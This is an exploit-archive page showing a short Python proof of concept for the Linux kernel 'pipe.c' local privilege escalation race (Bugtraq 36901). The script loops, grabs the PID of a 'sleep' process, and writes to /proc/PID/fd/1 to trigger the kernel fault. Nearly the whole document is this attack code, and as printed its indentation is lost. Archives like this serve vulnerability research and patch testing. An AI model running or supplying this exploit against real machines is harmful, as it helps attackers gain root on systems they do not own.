bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/9844.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

28 lines
No EOL
1.1 KiB
Python
Executable file
Raw Blame History

# This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters)
# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
# PoC by Matthew Bergin
# Bugtraq ID: 36901
#
# E-DB Note: Exploit Update v2 ~ https://github.com/offensive-security/exploitdb/pull/82/files
import os
import time
import random
import subprocess
#infinite loop
i = 0
x = 0
while (i == 0):
os.system("sleep 1")
while (x == 0):
time.sleep(random.random()) #random int 0.0-1.0
p = subprocess.Popen(["ps -elf | grep 'sleep 1' | grep -v 'grep' | awk '{print $4}'"], stdout=subprocess.PIPE, shell=True)
result = p.stdout.read()
pid = result.replace('\n', '').replace('\r', '')
if (pid == "0"): #need an active pid, race condition applies
print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
break
else:
print "[+] PID: " + pid
loc = "echo n > /proc/" + pid + "/fd/1"
os.system(loc) # triggers the fault, runs via sh
Reference in a new issue View git blame Copy permalink